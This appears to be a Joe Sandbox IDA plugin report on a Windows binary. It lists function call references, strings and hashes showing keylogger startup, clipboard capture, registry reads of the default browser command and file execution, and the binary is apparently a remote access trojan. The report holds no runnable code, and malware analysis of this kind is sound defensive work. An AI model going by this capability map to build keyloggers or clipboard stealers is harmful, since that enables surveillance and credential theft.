                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C9D1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$?begin@?$basic_string@?length@?$basic_string@D@1@@V01@@V10@V10@@$??2@?end@?$basic_string@ExecuteG@1@@LocalShellTimeV10@0@printf
                                                • String ID: Executing file: $[INFO]$open
                                                • API String ID: 4119484407-2604704123
                                                • Opcode ID: 3bed9d663014bf244eb53a2144bfc0b9fb76d710f38bad3c4ece149d7a420725
                                                • Instruction ID: d9ea162a00f2d85f2a64841ad60bdfc8b5f626de2847e39a60037bb7d6230f33
                                                • Opcode Fuzzy Hash: 3bed9d663014bf244eb53a2144bfc0b9fb76d710f38bad3c4ece149d7a420725
                                                • Instruction Fuzzy Hash: CD11F1B2510119AFDB05EFA1DC9ADEE777CFB14306B10456EF503A20A1EA789A448B68
                                                Function 00410E7F Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A8FF: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040A920
                                                  • Part of subcall function 0040A8FF: RegQueryValueExW.ADVAPI32(80000000,00410E9A,00000000,00000000,?,00000400), ref: 0040A93F
                                                  • Part of subcall function 0040A8FF: RegCloseKey.ADVAPI32(80000000), ref: 0040A948
                                                  • Part of subcall function 0040A8FF: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(004137F0,?), ref: 0040A967
                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00409292,?), ref: 00410EA7
                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,?,?,?,00409292), ref: 00410EBA
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00409292,?), ref: 00410EC4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00409292,?), ref: 00410ECD
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410EE6
                                                  • Part of subcall function 0041146F: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6C9BB010,?,?,00410EF5,?), ref: 0041147E
                                                  • Part of subcall function 0041146F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,00410EF5,?), ref: 0041149C
                                                  • Part of subcall function 0041146F: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00410EF5,?), ref: 004114A4
                                                  • Part of subcall function 0041146F: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,00410EF5,?), ref: 004114AF
                                                  • Part of subcall function 0041146F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,00410EF5,?), ref: 004114B9
                                                  • Part of subcall function 0041146F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410EF5,?), ref: 004114C2
                                                  • Part of subcall function 0041146F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410EF5,?), ref: 004114DA
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410EFC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410F05
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410F12
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410F1B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                                • String ID: .exe$http\shell\open\command
                                                • API String ID: 2647146128-4091164470
                                                • Opcode ID: 33277f11963d7f397d890b8c045dce3eaa13a1ec14160335fd81e132a05b4e33
                                                • Instruction ID: d6f4017d1acf330ffd9ea3a0570d33341eb30dc198aeee336e3e23a809a39518
                                                • Opcode Fuzzy Hash: 33277f11963d7f397d890b8c045dce3eaa13a1ec14160335fd81e132a05b4e33
                                                • Instruction Fuzzy Hash: BF11E27194021EABCF04FFE4DC59FED7738FB08705F444465F512A21A0DA78A649CB68
                                                Function 0040E2E1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 44clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EmptyClipboard.USER32 ref: 0040E2EC
                                                • CloseClipboard.USER32 ref: 0040E2F2
                                                • OpenClipboard.USER32 ref: 0040E2F9
                                                • GetClipboardData.USER32(00000001), ref: 0040E309
                                                • GlobalLock.KERNEL32(00000000), ref: 0040E312
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040E31B
                                                • CloseClipboard.USER32 ref: 0040E321
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 0040E33A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@CloseGlobal$??0?$basic_string@D@1@@DataEmptyLockOpenUnlock
                                                • String ID: p6A
                                                • API String ID: 2271350782-595022129
                                                • Opcode ID: 5f85183f277970b019e3875f479872c14d498aae06fac14b29891d889604458d
                                                • Instruction ID: 25b37f9453d8c0a7fad6b549be2581ec204041f5fca4ac65e44eedbcceb3e4e3
                                                • Opcode Fuzzy Hash: 5f85183f277970b019e3875f479872c14d498aae06fac14b29891d889604458d
                                                • Instruction Fuzzy Hash: B0012872A001059BD711BFB6ED599EE7B69FB44303B00C47AF503E22A1DF388A058B69
                                                Function 00401E2D Relevance: 18.1, APIs: 12, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 00401E32
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401E69
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419288,?,00419288,00419210), ref: 00401E90
                                                  • Part of subcall function 0041127D: _itoa.MSVCRT ref: 0041129B
                                                  • Part of subcall function 0041127D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,00000000,00419288,00000000,00419288,?,00419288,?), ref: 004112AF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EA7
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EB4
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EC1
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401ECB
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401EE0
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EE9
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EF2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EFB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F04
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                                • String ID:
                                                • API String ID: 3851886811-0
                                                • Opcode ID: 35475c4ddffdd618ff9e1b11199be341707f1c70f5df902499f6b0395ddbab61
                                                • Instruction ID: 73a5bfb5004111d374c9cb7e56b00a1bb3738c2c6af1c5718f4dd4a1ca4aa882
                                                • Opcode Fuzzy Hash: 35475c4ddffdd618ff9e1b11199be341707f1c70f5df902499f6b0395ddbab61
                                                • Instruction Fuzzy Hash: 8221EF72800109ABCB04EFE0DD5A9DE7B78FB14315F10426AF512F20A1EB755A59CBA5
                                                Function 00406F4B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406F55
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 00406F6D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 00406F7D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00406F8C
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406FB4
                                                • atoi.MSVCRT(00000000), ref: 00406FBB
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406FD8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407026
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040702F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@V01@@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@D@1@@V01@atoi
                                                • String ID: FunFunc
                                                • API String ID: 2980839617-81400306
                                                • Opcode ID: 281800f52224c484872fd29620b2c53c64ce7ae7eab454ec667632bd7bac0778
                                                • Instruction ID: a4306488e810cf182d76693ceca1b8f1be8bdcaab3c79d90a5d9b69e5bb3b8cd
                                                • Opcode Fuzzy Hash: 281800f52224c484872fd29620b2c53c64ce7ae7eab454ec667632bd7bac0778
                                                • Instruction Fuzzy Hash: B6217471A00205AFCF04BFB5EC1A9EE3768EB44716F008469F502E71E1EE389644CB5D
                                                Function 004044ED Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 72threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,75920F10,00419BC8,00000000,00419830,?,00408D5B,?,?,?,?,?,?,?,?,00000000), ref: 00404501
                                                  • Part of subcall function 004044C3: GetKeyboardLayout.USER32(00000000), ref: 004044C8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00404529
                                                  • Part of subcall function 0040512C: GetLocalTime.KERNEL32(?,00419830), ref: 0040513C
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ %04i/%02i/%02i %02i:%02i:%02i - ,?,! },?,?,?,?,?,6E@), ref: 00405172
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,6E@), ref: 0040517F
                                                  • Part of subcall function 0040512C: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,6E@), ref: 00405189
                                                  • Part of subcall function 0040512C: sprintf.MSVCRT ref: 00405197
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051A3
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051AC
                                                  • Part of subcall function 0040512C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051C2
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051DF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,00408D5B,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00404540
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00404554
                                                • CreateThread.KERNEL32(00000000,00000000,004045F8,00419830,00000000,00000000), ref: 00404572
                                                • CreateThread.KERNEL32(00000000,00000000,004045D8,00419830,00000000,00000000), ref: 00404582
                                                • CreateThread.KERNEL32(00000000,00000000,00404607,00419830,00000000,00000000), ref: 0040458E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404593
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@CreateD@1@@Thread$D@2@@0@G@2@@std@@G@std@@Hstd@@V01@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@KeyboardLayoutLocalTimeV01@@V10@V10@@Y?$basic_string@sprintf
                                                • String ID: Offline Keylogger Started$[INFO]
                                                • API String ID: 2102710441-3749928830
                                                • Opcode ID: 145f15bd44ed501514a613082b83bf21b5f087e840335586520c2844996bdea1
                                                • Instruction ID: ac7562e33836bebb496a87afd1c3c4dd197c8ef72cbbef37b559c4ef06f2e268
                                                • Opcode Fuzzy Hash: 145f15bd44ed501514a613082b83bf21b5f087e840335586520c2844996bdea1
                                                • Instruction Fuzzy Hash: 991190712001447BD321BB66DC8DDEF3E7CEAC2B96B00446EF90251181DA795A48C7B9
                                                Function 00405F6D Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,75920F00,?,?,?,?,?,00404E4B), ref: 00405F93
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,00419818,?,?,00000000,75920F00,?,?,?,?,?,00404E4B), ref: 00405FB9
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00404E4B), ref: 00405FCB
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413670,?,?,?,00404E4B), ref: 00405FDA
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],00419818,[End of clipboard text]), ref: 00405FFC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406006
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406018
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00404E4B), ref: 00406021
                                                Strings
                                                • [End of clipboard text], xrefs: 00405FF0
                                                • [Following text has been copied to clipboard:], xrefs: 00405FF6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                                • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                                • API String ID: 1191203583-3441917614
                                                • Opcode ID: c2372836ba6a479ec8bb9c0e366ea666785bf95403053d0e84f6d5f574d2177e
                                                • Instruction ID: 6ab36fa8e7f9ea28d027e51379386bb7229d2b7762e6091e91c455ed35123c8d
                                                • Opcode Fuzzy Hash: c2372836ba6a479ec8bb9c0e366ea666785bf95403053d0e84f6d5f574d2177e
                                                • Instruction Fuzzy Hash: 8D1181769001096BCF04FBA5E95AAEF7B6CDB45326F10407AF401F3181DB789E4986AE
                                                Function 00402500 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62timethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?,?,00419D80,00000000,?,?,?,?,?,?,?,?,?,?,?,0040C7C6), ref: 00402525
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,0040C7C6,?,?,?,00419D80,00000000), ref: 00402551
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00419D80,00000000), ref: 0040255C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00419D80,00000000,?,?,?,?,?,?,?,?,?,?,?,0040C7C6), ref: 00402566
                                                • printf.MSVCRT ref: 0040256D
